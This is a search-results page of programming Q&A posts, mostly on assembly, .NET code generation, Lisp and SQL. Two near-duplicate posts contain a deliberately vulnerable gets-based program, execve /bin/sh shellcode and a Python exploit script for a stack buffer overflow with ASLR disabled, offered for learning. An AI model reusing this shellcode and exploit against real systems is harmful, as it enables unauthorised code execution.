Search Results

Search found 509 results on 21 pages for 'ret'.


  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine.

    Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code)

    Vulnerable file buffer.s:

        .data
        .fmtsp:
        .string "Stackpointer %p\n"
        .fmtjump:
        .string "Jump to %p\n"
        .text
        .global main
        main:
            push %rbp
            mov %rsp, %rbp
            sub $120, %rsp
            # calling printf without setting rax
            # to zero results in a segfault. why?
            xor %rax, %rax
            mov %rsp, %rsi
            mov $.fmtsp, %rdi
            call printf
            mov %rsp, %rdi
            call gets
            xor %rax, %rax
            mov $.fmtjump, %rdi
            mov 8(%rbp), %rsi
            call printf
            xor %rax, %rax
            leave
            ret

    shellcode.s

        .text
        .global main
        main:
            mov $0x68732f6e69622fff, %rbx
            shr $0x8, %rbx
            push %rbx
            mov %rsp, %rdi
            xor %rsi, %rsi
            xor %rdx, %rdx
            xor %rax, %rax
            add $0x3b, %rax
            syscall

    exploit.py

        shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
        stackpointer = "\x7f\xff\xff\xff\xe3\x28"
        output = shellcode
        output += 'a' * (120 - len(shellcode)) # fill buffer
        output += 'b' * 8 # override stored base pointer
        output += ''.join(reversed(stackpointer))
        print output

    Compiled with:

        $ gcc -o buffer buffer.s
        $ gcc -o shellcode shellcode.s

    Started with:

        $ python exploit.py | ./buffer
        Stackpointer 0x7fffffffe328
        Jump to 0x7fffffffe328

    Debugging with gdb:

        $ python exploit.py > exploit.txt
        (Note: corrected stackpointer address in exploit.py for gdb)
        $ gdb buffer
        (gdb) run < exploit.txt
        Starting program: /home/henning/bo/buffer < exploit.txt
        Stackpointer 0x7fffffffe308
        Jump to 0x7fffffffe308
        process 4185 is executing new program: /bin/dash
        Program exited normally.


  • Land of Lisp example question

    - by cwallenpoole
    I've read a lot of good things about Land of Lisp so I thought that I might go through it to see what there was to see.

        (defun tweak-text (lst caps lit)
          (when lst
            (let ((item (car lst))
                  (rest (cdr lst)))
              (cond
                ; If item = space, then call recursively starting with ret
                ; Then, prepend the space on to the result.
                ((eq item #\space) (cons item (tweak-text rest caps lit)))
                ; if the item is an exclamation point. Make sure that the
                ; next non-space is capitalized.
                ((member item '(#\! #\? #\.)) (cons item (tweak-text rest t lit)))
                ; if item = " then toggle whether we are in literal mode
                ((eq item #\") (tweak-text rest caps (not lit)))
                ; if literal mode, just add the item as is and continue
                (lit (cons item (tweak-text rest nil lit)))
                ; if either caps or literal mode = true capitalize it?
                ((or caps lit) (cons (char-upcase item) (tweak-text rest nil lit)))
                ; otherwise lower-case it.
                (t (cons (char-downcase item) (tweak-text rest nil nil)))))))

    (the comments are mine)

    (FYI -- the method signature is (list-of-symbols bool-whether-to-caps bool-whether-to-treat-literally) but the author shortened these to (lst caps lit).)

    But anyway, here's the question: This has (cond... (lit ...) ((or caps lit) ...)) in it. My understanding is that this would translate to if(lit){ ... } else if(caps || lit){...} in a C style syntax. Isn't the or statement redundant then? Is there ever a condition where the (or caps lit) condition will be called if caps is nil?


  • Setting System.Drawing.Color through .NET COM Interop

    - by Maxim
    I am trying to use Aspose.Words library through COM Interop. There is one critical problem: I cannot set color. It is supposed to work by assigning to DocumentBuilder.Font.Color, but when I try to do it I get OLE error 0x80131509. My problem is pretty much like this one: http://bit.ly/cuvWfc

    update: Code Sample:

        from win32com.client import Dispatch
        Doc = Dispatch("Aspose.Words.Document")
        Builder = Dispatch("Aspose.Words.DocumentBuilder")
        Builder.Document = Doc
        print Builder.Font.Size
        print Builder.Font.Color

    Result:

        12.0
        Traceback (most recent call last):
          File "aaa.py", line 6, in <module>
            print Builder.Font.Color
          File "D:\Python26\lib\site-packages\win32com\client\dynamic.py", line 501, in __getattr__
            ret = self._oleobj_.Invoke(retEntry.dispid,0,invoke_type,1)
        pywintypes.com_error: (-2146233079, 'OLE error 0x80131509', None, None)

    Using something like Font.Color = 0xff0000 fails with same error message

    While this code works ok:

        using Aspose.Words;

        namespace ConsoleApplication1
        {
            class Program
            {
                static void Main(string[] args)
                {
                    Document doc = new Document();
                    DocumentBuilder builder = new DocumentBuilder(doc);
                    builder.Font.Color = System.Drawing.Color.Blue;
                    builder.Write("aaa");
                    doc.Save("c:\\1.doc");
                }
            }
        }

    So it looks like COM Interop problem.


  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine.

    Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code)

    Vulnerable file buffer.s:

        .data
        .fmtsp:
        .string "Stackpointer %p\n"
        .fmtjump:
        .string "Jump to %p\n"
        .text
        .global main
        main:
            push %rbp
            mov %rsp, %rbp
            sub $120, %rsp
            # calling printf without setting rax
            # to zero results in a segfault. why?
            xor %rax, %rax
            mov %rsp, %rsi
            mov $.fmtsp, %rdi
            call printf
            mov %rsp, %rdi
            call gets
            xor %rax, %rax
            mov $.fmtjump, %rdi
            mov 8(%rbp), %rsi
            call printf
            xor %rax, %rax
            leave
            ret

    shellcode.s

        .text
        .global main
        main:
            mov $0x68732f6e69622fff, %rbx
            shr $0x8, %rbx
            push %rbx
            mov %rsp, %rdi
            xor %rsi, %rsi
            xor %rdx, %rdx
            xor %rax, %rax
            add $0x3b, %rax
            syscall

    exploit.py

        shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
        stackpointer = "\x7f\xff\xff\xff\xe3\x28"
        output = shellcode
        output += 'a' * (120 - len(shellcode)) # fill buffer
        output += 'b' * 8 # override stored base pointer
        output += ''.join(reversed(stackpointer))
        print output

    Compiled with:

        $ gcc -o buffer buffer.s
        $ gcc -o shellcode shellcode.s

    Started with:

        $ python exploit.py | ./buffer
        Stackpointer 0x7fffffffe328
        Jump to 0x7fffffffe328


  • nasm/yasm arguments, linkage to C++

    - by arionik
    Hello everybody, I've got a question concerning nasm and its linkage to C++. I declare a little test function as

        extern "C" void __cdecl myTest( byte i1, byte i2, int stride, int *width );

    and I call it like this:

        byte i1 = 1, i2 = 2;
        int stride = 3, width = 4;
        myTest( i1, i2, stride, &width );

    The method only serves to debug assembly and have a look at how the stack pointer is used to get the arguments. Beyond that, the pointer argument's value shall be set to 7, to figure out how that works. This is implemented like this:

        global _myTest
        _myTest:
            mov eax, [esp+4] ; 1
            mov ebx, [esp+8] ; 2
            mov ecx, dword [esp+16] ; width
            mov edx, dword [esp+12] ; stride
            mov eax, dword [esp+16]
            mov dword [eax], 7
            ret

    and compiled via

        yasm -f win32 -g cv8 -m x86 -o "$(IntDir)\$(InputName).obj" "$(InputPath)"

    , then linked to the C++ app. In debug mode, everything works fine. The function is called a couple of times and works as expected, whereas in release mode the function works once, but subsequent program operations fail. It seems to me that something's wrong with stack/frame pointers, near/far, but I'm quite new to this subject and need a little help. Thanks in advance! a.


  • Generate exe in .Net

    - by rwallace
    In .Net, you can generate byte code in memory, and presumably save the resulting program to a .exe file. To do the first step, I have the following test code adapted from http://www.code-magazine.com/Article.aspx?quickid=0301051

        var name = new AssemblyName();
        name.Name = "MyAssembly";
        var ad = Thread.GetDomain();
        var ab = ad.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run);
        var mb = ab.DefineDynamicModule("MyModule");
        var theClass = mb.DefineType("MathOps", TypeAttributes.Public);
        var retType = typeof(System.Int32);
        var parms = new Type[2];
        parms[0] = typeof(System.Int32);
        parms[1] = typeof(System.Int32);
        var meb = theClass.DefineMethod("ReturnSum", MethodAttributes.Public, retType, parms);
        var gen = meb.GetILGenerator();
        gen.Emit(OpCodes.Ldarg_1);
        gen.Emit(OpCodes.Ldarg_2);
        gen.Emit(OpCodes.Add_Ovf);
        gen.Emit(OpCodes.Stloc_0);
        gen.Emit(OpCodes.Br_S);
        gen.Emit(OpCodes.Ldloc_0);
        gen.Emit(OpCodes.Ret);
        theClass.CreateType();

    How do you do the second step, and save the result to a .exe?


  • Attempting to convert an if statement to assembly

    - by Malfist
    What am I doing wrong? This is the assembly I've written:

        char encode(char plain){
            __asm{
                mov al, plain

                ;check for y or z status
                cmp al, 'y'
                je YorZ
                cmp al, 'z'
                je YorZ
                cmp al, 'Y'
                je YorZ
                cmp al, 'Z'
                je YorZ

                ;check to make sure it is in the alphabet now
                mov cl, al
                sub cl, 'A'
                cmp cl, 24
                jl Other
                sub cl, '6' ;there are six characters between 'Z' and 'a'
                cmp cl, 24
                jl Other
                jmp done ;means it is not in the alphabet

            YorZ:
                sub al, 24
                jmp done
            Other:
                add al, 2
                jmp done
            done:
                leave
                ret
            }
        }

    and this is the C code it's supposed to replace, but doesn't

        char encode(char plain){
            char code;
            if((plain>='a' && plain<='x') || (plain>='A' && plain <='X')){
                code = plain+2;
            }else if(plain == 'y' || plain=='z' || plain=='Y' || plain == 'Z'){
                code = plain - 24;
            }else{
                code = plain;
            }
            return code;
        }

    It seems to convert every character that isn't an y,z,Y,Z into a plus 2 equivalent instead of just A-Xa-x. Any ideas why?


  • Problems with generation of dynamic code

    - by user308344
    This code gives an exception: Invocation exception. Please help, I don't know what happens. I think it is something with the Add, because it works when I push integers onto the stack, and when I push an lvalue it doesn't work. Thanks.

        static void Main(string[] args)
        {
            AppDomain dominioAplicacion = System.Threading.Thread.GetDomain();
            AssemblyName nombre_Del_Ensamblado = new AssemblyName("ASS");
            AssemblyBuilder ensambladoBld = dominioAplicacion.DefineDynamicAssembly(nombre_Del_Ensamblado, AssemblyBuilderAccess.RunAndSave);
            ModuleBuilder moduloBld = ensambladoBld.DefineDynamicModule("<MOD");
            TypeBuilder claseContenedoraBld = moduloBld.DefineType("claseContenedora");
            MethodBuilder mainBld = claseContenedoraBld.DefineMethod("main", MethodAttributes.Public | MethodAttributes.Static, typeof(void), Type.EmptyTypes);
            ILGenerator il = mainBld.GetILGenerator();

            FieldBuilder campoBld = claseContenedoraBld.DefineField("x", typeof(int), FieldAttributes.Public | FieldAttributes.Static);
            il.Emit(OpCodes.Ldc_I4, 2);
            il.Emit(OpCodes.Stsfld, campoBld);

            FieldBuilder campoBld1 = claseContenedoraBld.DefineField("x1", typeof(int), FieldAttributes.Public | FieldAttributes.Static);
            il.Emit(OpCodes.Ldc_I4, 2);
            il.Emit(OpCodes.Stsfld, campoBld1);

            il.Emit(OpCodes.Ldftn, campoBld);
            //il.Emit(OpCodes.Unbox, typeof(int));
            //il.Emit(OpCodes.Stloc_0);
            il.Emit(OpCodes.Ldloc_0);
            il.Emit(OpCodes.Ldftn, campoBld1);
            //il.Emit(OpCodes.Unbox, typeof(int));
            il.Emit(OpCodes.Stloc_1);
            il.Emit(OpCodes.Ldloc_1);
            //il.Emit(OpCodes.Box, typeof(int));
            //il.Emit(OpCodes.Ldftn, campoBld1);
            //il.Emit(OpCodes.Unbox, typeof(int));
            il.Emit(OpCodes.Add);
            il.Emit(OpCodes.Pop);
            //il.Emit(OpCodes.Stsfld, campoBld1);
            il.Emit(OpCodes.Ret);

            Type t = claseContenedoraBld.CreateType();
            object ptInstance = Activator.CreateInstance(t, new Type[] { });
            t.InvokeMember("main", BindingFlags.InvokeMethod | BindingFlags.Static | BindingFlags.Public, null, ptInstance, new object[0]);
            var x = t.GetField("x");
        }


  • setcontext and makecontext to call a generic function pointer

    - by Simone Margaritelli
    In another question I had the problem to port the code

        unsigned long stack[] = { 1, 23, 33, 43 };

        /* save all the registers and the stack pointer */
        unsigned long esp;
        asm __volatile__ ( "pusha" );
        asm __volatile__ ( "mov %%esp, %0" :"=m" (esp));

        for( i = 0; i < sizeof(stack); i++ ){
            unsigned long val = stack[i];
            asm __volatile__ ( "push %0" :: "m"(val) );
        }

        unsigned long ret = function_pointer();

        /* restore registers and stack pointer */
        asm __volatile__ ( "mov %0, %%esp" :: "m" (esp) );
        asm __volatile__ ( "popa" );

    to a 64bit platform and many guys told me I should use the setcontext and makecontext functions set instead due to the calling conversion differences between 32 and 64 bits and portability issues. Well, I really can't find any useful documentation online, or at least not the kind I need to implement this, so, how can I use those functions to push arguments onto the stack, call a generic function pointer, obtain the return value and then restore the registers?


  • Mac OS X linker error in Qt; CoreGraphics & CGWindowListCreate

    - by Jake Petroules
    Here is my .mm file

        #include "windowmanagerutils.h"

        #ifdef Q_OS_MAC
        #import </System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Headers/CGWindow.h>

        QRect WindowManagerUtils::getWindowRect(WId windowId)
        {
            CFArrayRef windows = CGWindowListCreate(kCGWindowListOptionOnScreenOnly, kCGNullWindowID);
            return QRect();
        }

        QRect WindowManagerUtils::getClientRect(WId windowId)
        {
            return QRect();
        }

        QString WindowManagerUtils::getWindowText(WId windowId)
        {
            return QString();
        }

        WId WindowManagerUtils::rootWindow()
        {
            return QApplication::desktop()->winId();
        }

        WId WindowManagerUtils::windowFromPoint(const QPoint &p, WId parent, bool(*filterFunction)(WId))
        {
            return NULL;
        }

        void WindowManagerUtils::setTopMostCarbon(const QWidget *const window, bool topMost)
        {
            if (!window)
            {
                return;
            }

            // Find a Cocoa equivalent for this Carbon function
            // [DllImport("/System/Library/Frameworks/Carbon.framework/Versions/Current/Carbon")]
            // OSStatus ret = HIViewSetZOrder(this->winId(), kHIViewZOrderAbove, NULL);
        }
        #endif

    The linker is telling me "_CGWindowListCreate" is undefined. What libraries must I link to? Apple's documentation is not very helpful on telling what to include or link to, like MSDN is. Also I couldn't just do #import <CGWindow.h>, I had to specify the absolute path to it... any way around that?


  • What Scheme Does Ghuloum Use?

    - by Don Wakefield
    I'm trying to work my way through Compilers: Backend to Frontend (and Back to Front Again) by Abdulaziz Ghuloum. It seems abbreviated from what one would expect in a full course/seminar, so I'm trying to fill in the pieces myself. For instance, I have tried to use his testing framework in the R5RS flavor of DrScheme, but it doesn't seem to like the macro stuff:

        src/ghuloum/tests/tests-driver.scm:6:4: read: illegal use of open square bracket

    I've read his intro paper on the course, An Incremental Approach to Compiler Construction, which gives a great overview of the techniques used, and mentions a couple of Schemes with features one might want to implement for 'extra credit', but he doesn't mention the Scheme he uses in the course.

    Update

    I'm still digging into the original question (investigating options such as Petit Scheme suggested by Eli below), but found an interesting link relating to Ghuloum's work, so I am including it here. [Ikarus Scheme](http://en.wikipedia.org/wiki/Ikarus_(Scheme_implementation)) is the actual implementation of Ghuloum's ideas, and appears to have been part of his Ph.D. work. It's supposed to be one of the first implementations of R6RS. I'm trying to install Ikarus now, but the configure script doesn't want to recognize my system's install of libgmp.so, so my problems are still unresolved.

    Example

    The following example seems to work in PLT 2.4.2 running in DrEd using the Pretty Big

        (require lang/plt-pretty-big)
        (load "/Users/donaldwakefield/ghuloum/tests/tests-driver.scm")
        (load "/Users/donaldwakefield/ghuloum/tests/tests-1.1-req.scm")
        (define (emit-program x)
          (unless (integer? x) (error "---"))
          (emit " .text")
          (emit " .globl scheme_entry")
          (emit " .type scheme_entry, @function")
          (emit "scheme_entry:")
          (emit " movl $~s, %eax" x)
          (emit " ret")
          )

    Attempting to replace the require directive with #lang scheme results in the error message

        foo.scm:7:3: expand: unbound identifier in module in: emit

    which appears to be due to a failure to load tests-driver.scm. Attempting to use #lang r6rs disables the REPL, which I'd really like to use, so I'm going to try to continue with Pretty Big. My thanks to Eli Barzilay for his patient help.


  • Alternative to sql NOT IN?

    - by Alex
    Hi, I am trying to make a materialized view in Oracle (I am a newbie, btw). For some reason, it doesn't like the presence of sub-query in it. I've been trying to use LEFT OUTER JOIN instead, but it's returning different data set now. Put simply, here's the code I'm trying to modify:

        SELECT *
        FROM table1 ros, table2 bal, table3 flx
        WHERE flx.name = 'XXX'
          AND flx.value = bal.value
          AND NVL (ros.ret, 'D') = Nvl (flx.attr16, 'D')
          AND ros.value = bal.segment3
          AND ros.type IN ( 'AL', 'AS', 'PL' )
          AND bal.period = 13
          AND bal.code NOT IN (SELECT bal1.code
                               FROM table2 bal1
                               WHERE bal1.value = flx.value
                                 AND bal1.segment3 = ros.value
                                 AND bal1.flag = bal.flag
                                 AND bal1.period = 12
                                 AND bal1.year = bal.year)

    And here's one of my attempts:

        SELECT *
        FROM table1 ros, table2 bal, table3 flx
        LEFT OUTER JOIN table2 bal1 ON bal.code = bal1.code
        WHERE bal1.code is null
          AND bal1.segment3 = ros.value
          AND bal.segment3 = ros.value
          AND bal1.flag = bal.flag
          AND bal1.year = bal.year
          AND flx.name = 'XXX'
          AND flx.value = bal.value
          AND bal1.value = flx.value
          AND bal1.period_num = 12
          AND NVL (ros.type, 'D') = NVL (flx.attr16, 'D')
          AND ros.value = bal.segment3
          AND ros.type IN ( 'AL', 'AS', 'PL' )
          AND bal.period = 13;

    This drives me nuts! Thanks in advance for the help :)


  • i386 assembly question: why do I need to meddle with the stack pointer?

    - by zneak
    Hello everyone, I decided it would be fun to learn x86 assembly during the summer break. So I started with a very simple hello world program, borrowing on free examples gcc -S could give me. I ended up with this:

        HELLO:
            .ascii "Hello, world!\12\0"
            .text
        .globl _main
        _main:
            pushl %ebp # 1. puts the base stack address on the stack
            movl %esp, %ebp # 2. puts the base stack address in the stack address register
            subl $20, %esp # 3. ???
            pushl $HELLO # 4. push HELLO's address on the stack
            call _puts # 5. call puts
            xorl %eax, %eax # 6. zero %eax, probably not necessary since we didn't do anything with it
            leave # 7. clean up
            ret # 8. return
            # PROFIT!

    It compiles and even works! And I think I understand most of it. Though, magic happens at step 3. Would I remove this line, my program would die between the call to puts and the xor from a misaligned stack error. And would I change $20 to another value, it'd crash too. So I came to the conclusion that this value is very important. Problem is, I don't know what it does and why it's needed. Can anyone explain me? (I'm on Mac OS, would it ever matter.)


  • Insert MANY key value pairs fast into berkeley db with hash access

    - by Kungi
    Hi, I'm trying to build a hash with berkeley db, which shall contain many tuples (approx 18GB of key value pairs), but in all my tests the performance of the insert operations degrades drastically over time. I've written this script to test the performance:

        #include<iostream>
        #include<db_cxx.h>
        #include<ctime>

        #define MILLION 1000000

        int main () {
            long long a = 0;
            long long b = 0;
            int passes = 0;
            int i = 0;
            u_int32_t flags = DB_CREATE;

            Db* dbp = new Db(NULL,0);
            dbp->set_cachesize( 0, 1024 * 1024 * 1024, 1 );
            int ret = dbp->open( NULL, "test.db", NULL, DB_HASH, flags, 0);

            time_t time1 = time(NULL);

            while ( passes < 100 ) {
                while( i < MILLION ) {
                    Dbt key( &a, sizeof(long long) );
                    Dbt data( &b, sizeof(long long) );
                    dbp->put( NULL, &key, &data, 0);
                    a++;
                    b++;
                    i++;
                }
                DbEnv* dbep = dbp->get_env();
                int tmp;
                dbep->memp_trickle( 50, &tmp );
                i=0;
                passes++;
                std::cout << "Inserted one million --> pass: " << passes << " took: " << time(NULL) - time1 << "sec" << std::endl;
                time1 = time(NULL);
            }
        }

    Perhaps you can tell me why after some time the "put" operation takes increasingly longer and maybe how to fix this. Thanks for your help, Andreas


  • Exiting from the Middle of an Expression Without Using Exceptions

    - by Jon Purdy
    Is there a way to emulate the use of flow-control constructs in the middle of an expression? Is it possible, in a comma-delimited expression x, y, for y to cause a return?

    Edit: I'm working on a compiler for something rather similar to a functional language, and the target language is C++. Everything is an expression in the source language, and the sanest, simplest translation to the destination language leaves as many things expressions as possible. Basically, semicolons in the target language become C++ commas. In-language flow-control constructs have presented no problems thus far; it's only return. I just need a way to prematurely exit a comma-delimited expression, and I'd prefer not to use exceptions unless someone can show me that they don't have excessive overhead in this situation. The problem of course is that most flow-control constructs are not legal expressions in C++. The only solution I've found so far is something like this:

        try {
            return
                x(), // x();
                (1 ? throw Return(0) : 0); // return 0;
        } catch (Return& ret) {
            return ret.value;
        }

    The return statement is always there (in the event that a Return construct is not reached), and as such the throw has to be wrapped in ?: to get the compiler to shut up about its void result being used in an expression. I would really like to avoid using exceptions for flow control, unless in this case it can be shown that no particular overhead is incurred; does throwing an exception cause unwinding or anything here? This code needs to run with reasonable efficiency. I just need a function-level equivalent of exit().


  • How can I know what this does?

    - by Dabor Troppe
    I got this piece of Assembly code extracted from some piece of software, but unfortunately I don't know anything of assembler and the bits I touched of Assembler was back in the Commodore Amiga with the 68000. Can anybody guide me on how I could understand this code without me needing to learn assembler from scratch, or just tell me what it does? Is there any kind of "Simulator" out there that I can run this on to see what it does?

        -[ObjSample Param1:andParam2:]:
        00000c79 pushl %ebp
        00000c7a movl %esp,%ebp
        00000c7c subl $0x48,%esp
        00000c7f movl %ebx,0xf4(%ebp)
        00000c82 movl %esi,0xf8(%ebp)
        00000c85 movl %edi,0xfc(%ebp)
        00000c88 calll 0x00000c8d
        00000c8d popl %ebx
        00000c8e cmpb $-[ObjSample delegate],_bDoOnce.26952-0xc8d(%ebx)
        00000c95 jel 0x00000d47
        00000c9b movb $-[ObjSample delegate],_bDoOnce.26952-0xc8d(%ebx)
        00000ca2 movl 0x7dc0-0xc8d(%ebx),%eax
        00000ca8 movl %eax,0x04(%esp)
        00000cac movl 0x7df4-0xc8d(%ebx),%eax
        00000cb2 movl %eax,(%esp)
        00000cb5 calll _objc_msgSend
        00000cba movl 0x7dbc-0xc8d(%ebx),%edx
        00000cc0 movl %edx,0x04(%esp)
        00000cc4 movl %eax,(%esp)
        00000cc7 calll _objc_msgSend
        00000ccc movl %eax,0xe4(%ebp)
        00000ccf movl 0x7db8-0xc8d(%ebx),%eax
        00000cd5 movl %eax,0x04(%esp)
        00000cd9 movl 0xe4(%ebp),%eax
        00000cdc movl %eax,(%esp)
        00000cdf calll _objc_msgSend
        00000ce4 leal (%eax,%eax),%edi
        00000ce7 movl %edi,(%esp)
        00000cea calll _malloc
        00000cef movl %eax,%esi
        00000cf1 movl %edi,0x08(%esp)
        00000cf5 movl $-[ObjSample delegate],0x04(%esp)
        00000cfd movl %eax,(%esp)
        00000d00 calll _memset
        00000d05 movl $0x00000004,0x10(%esp)
        00000d0d movl %edi,0x0c(%esp)
        00000d11 movl %esi,0x08(%esp)
        00000d15 movl 0x7db4-0xc8d(%ebx),%eax
        00000d1b movl %eax,0x04(%esp)
        00000d1f movl 0xe4(%ebp),%eax
        00000d22 movl %eax,(%esp)
        00000d25 calll _objc_msgSend
        00000d2a xorl %edx,%edx
        00000d2c movl %edi,%eax
        00000d2e shrl $0x03,%eax
        00000d31 jmp 0x00000d34
        00000d33 incl %edx
        00000d34 cmpl %edx,%eax
        00000d36 ja 0x00000d33
        00000d38 movl %esi,(%esp)
        00000d3b calll _free
        00000d40 movb $0x01,_isAuthenticated-0xc8d(%ebx)
        00000d47 movzbl _isAuthenticated-0xc8d(%ebx),%eax
        00000d4e movl 0xf4(%ebp),%ebx
        00000d51 movl 0xf8(%ebp),%esi
        00000d54 movl 0xfc(%ebp),%edi
        00000d57 leave
        00000d58 ret


  • x86_64 assembler: only one call per subroutine?

    - by zneak
    Hello everyone, I decided yesterday to start doing assembler. Most of it is okay (well, as okay as assembler can be), but I'm getting some problems with gas. It seems that I can call functions only once. After that, any subsequent call opcode with the same function name will fail. I must be doing something terribly wrong, though I can't see what. Take this small C function for instance:

        void path_free(path_t path)
        {
            if (path == NULL) return;
            free(((point_list_t*)path)->points);
            free(path);
        }

    I "translated" it to assembler like that:

        .globl _path_free
        _path_free:
            push rbp
            mov rbp, rsp
            cmp rdi, 0
            jz byebye
            push rdi
            mov rdi, qword ptr [rdi]
            call _free
            pop rdi
            sub rsp, 8
            call _free
        byebye:
            leave
            ret

    This triggers the following error for the second call _free: suffix or operands invalid for ``call''. And if I change it to something else, like free2, everything works (until link time, that is). Assembler code gcc -S gave me looks very similar to what I've done (except it's in AT&T syntax), so I'm kind of lost. I'm doing this on Mac OS X under the x86_64 architecture.


  • I'm about to learn x86 assembly on os x 10.6 let me know how compile..plz

    - by kevin choung
    hello~ I'm about to learn x86 assembly language on mac os x... I'm using as instruction to compile assembly file in command window. but I have several errors.. and I don't know how I can get through.. here is the errors and my assembly code.. which is quite simple.

        ung-mi-lims-macbook-pro:pa2 ungmi$ as swap.s
        swap.s:16:Unknown pseudo-op: .type
        swap.s:16:Rest of line ignored. 1st junk character valued 115 (s).
        swap.s:19:suffix or operands invalid for `push'
        swap.s:46:suffix or operands invalid for `pop'
        ung-mi-lims-macbook-pro:pa2 ungmi$

    and the source is

        .text
        .align 4
        .globl swap
        .type swap,@function
        swap:
            pushl %ebp
            movl %esp, %ebp
            movl %ebp, %esp
            popl %ebp
            ret

    and I searched some solution which is I have to put -arch i386 than

        ung-mi-lims-macbook-pro:pa2 ungmi$ as -arch i386 swap.s
        swap.s:16:Unknown pseudo-op: .type
        swap.s:16:Rest of line ignored. 1st junk character valued 115 (s).
        ung-mi-lims-macbook-pro:pa2 ungmi$

    could you help me out.. just let me know what I need to compile assembly file.. I have xcode already.. and I'd rather to do this with command window..and vi editor.. I will be waiting for your answer... plz help me.


  • Compile Assembly Output generated by VC++?

    - by SDD
    I have a simple hello world C program and compile it with /FA. As a consequence, the compiler also generates the corresponding assembly listing. Now I want to use masm/link to assemble an executable from the generated .asm listing. The following command line yields 3 linker errors:

        \masm32\bin\ml /I"C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include" /c /coff asm_test.asm
        \masm32\bin\link /SUBSYSTEM:CONSOLE /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\lib" asm_test.obj

    indicating that the C-runtime functions were not linked to the object files produced earlier:

        asm_test.obj : error LNK2001: unresolved external symbol @__security_check_cookie@4
        asm_test.obj : error LNK2001: unresolved external symbol _printf
        LINK : error LNK2001: unresolved external symbol _wmainCRTStartup
        asm_test.exe : fatal error LNK1120: 3 unresolved externals

    Here is the generated assembly listing

        ; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01

            TITLE c:\asm_test\asm_test\asm_test.cpp
            .686P
            .XMM
            include listing.inc
            .model flat

        INCLUDELIB OLDNAMES

        PUBLIC ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ ; `string'
        EXTRN @__security_check_cookie@4:PROC
        EXTRN _printf:PROC
        ; COMDAT ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@
        CONST SEGMENT
        ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ DB 'hello world!', 0aH, 00H ; `string'
        CONST ENDS
        PUBLIC _wmain
        ; Function compile flags: /Ogtpy
        ; COMDAT _wmain
        _TEXT SEGMENT
        _argc$ = 8 ; size = 4
        _argv$ = 12 ; size = 4
        _wmain PROC ; COMDAT
        ; File c:\users\octon\desktop\asm_test\asm_test\asm_test.cpp
        ; Line 21
            push OFFSET ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@
            call _printf
            add esp, 4
        ; Line 22
            xor eax, eax
        ; Line 23
            ret 0
        _wmain ENDP
        _TEXT ENDS
        END

    I am using the latest masm32 version (6.14.8444).


  • help me improve my sse yuv to rgb ssse3 code

    - by David McPaul
    Hello, I am looking to optimise some sse code I wrote for converting yuv to rgb (both planar and packed yuv functions). I am using SSSE3 at the moment but if there are useful functions from later sse versions that's ok. I am mainly interested in how I would work out processor stalls and the like. Anyone know of any tools that do static analysis of sse code?

        ;
        ; Copyright (C) 2009-2010 David McPaul
        ;
        ; All rights reserved. Distributed under the terms of the MIT License.
        ;

        ; A rather unoptimised set of ssse3 yuv to rgb converters
        ; does 8 pixels per loop

        ; inputer:
        ; reads 128 bits of yuv 8 bit data and puts
        ; the y values converted to 16 bit in xmm0
        ; the u values converted to 16 bit and duplicated into xmm1
        ; the v values converted to 16 bit and duplicated into xmm2

        ; conversion:
        ; does the yuv to rgb conversion using 16 bit integer and the
        ; results are placed into the following registers as 8 bit clamped values
        ; r values in xmm3
        ; g values in xmm4
        ; b values in xmm5

        ; outputer:
        ; writes out the rgba pixels as 8 bit values with 0 for alpha

        ; xmm6 used for scratch
        ; xmm7 used for scratch

        %macro cglobal 1
            global _%1
            %define %1 _%1
            align 16
        %1:
        %endmacro

        ; conversion code
        %macro yuv2rgbsse2 0
        ; u = u - 128
        ; v = v - 128
        ; r = y + v + v >> 2 + v >> 3 + v >> 5
        ; g = y - (u >> 2 + u >> 4 + u >> 5) - (v >> 1 + v >> 3 + v >> 4 + v >> 5)
        ; b = y + u + u >> 1 + u >> 2 + u >> 6
        ; subtract 16 from y
            movdqa xmm7, [Const16] ; loads a constant using data cache (slower on first fetch but then cached)
            psubsw xmm0,xmm7 ; y = y - 16
        ; subtract 128 from u and v
            movdqa xmm7, [Const128] ; loads a constant using data cache (slower on first fetch but then cached)
            psubsw xmm1,xmm7 ; u = u - 128
            psubsw xmm2,xmm7 ; v = v - 128
        ; load r,b with y
            movdqa xmm3,xmm0 ; r = y
            pshufd xmm5,xmm0, 0xE4 ; b = y

        ; r = y + v + v >> 2 + v >> 3 + v >> 5
            paddsw xmm3, xmm2 ; add v to r
            movdqa xmm7, xmm1 ; move u to scratch
            pshufd xmm6, xmm2, 0xE4 ; move v to scratch

            psraw xmm6,2 ; divide v by 4
            paddsw xmm3, xmm6 ; and add to r
            psraw xmm6,1 ; divide v by 2
